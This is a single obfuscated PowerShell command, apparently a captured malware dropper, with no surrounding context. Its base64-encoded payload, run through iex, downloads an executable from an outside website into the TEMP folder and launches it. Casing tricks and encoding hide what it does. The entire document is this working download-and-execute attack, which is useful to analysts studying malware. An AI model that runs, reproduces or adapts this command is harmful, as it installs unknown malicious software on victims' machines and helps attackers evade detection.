iex([SYsTEM.Text.ENCodiNG]::UTF8.getSTRInG([sySTem.coNVErT]::FROmbase64sTRiNg('CihOZXctT2JqZWN0IHN5c3RFTS5uZVQud0ViQ0xpRU5UKS5Eb3dObE9hZGZJbEUoJ2h0dHA6Ly93d3cud2VhbHRoYW5kaGVhbHRob3BzLmNvbS9tb2R1bGVzL21vZF9lYXN5YmxvZ3F1aWNrcG9zdC9sYXdkc2lqZG9lZi5leGUnLCIkRU52OlRFTVBcbGF3ZHNpamRvZWYuZXhlIik7U3RhcnQtUHJvY2VzcyAoIiRFTnY6VEVNUFxsYXdkc2lqZG9lZi5leGUiKQoK')));exit
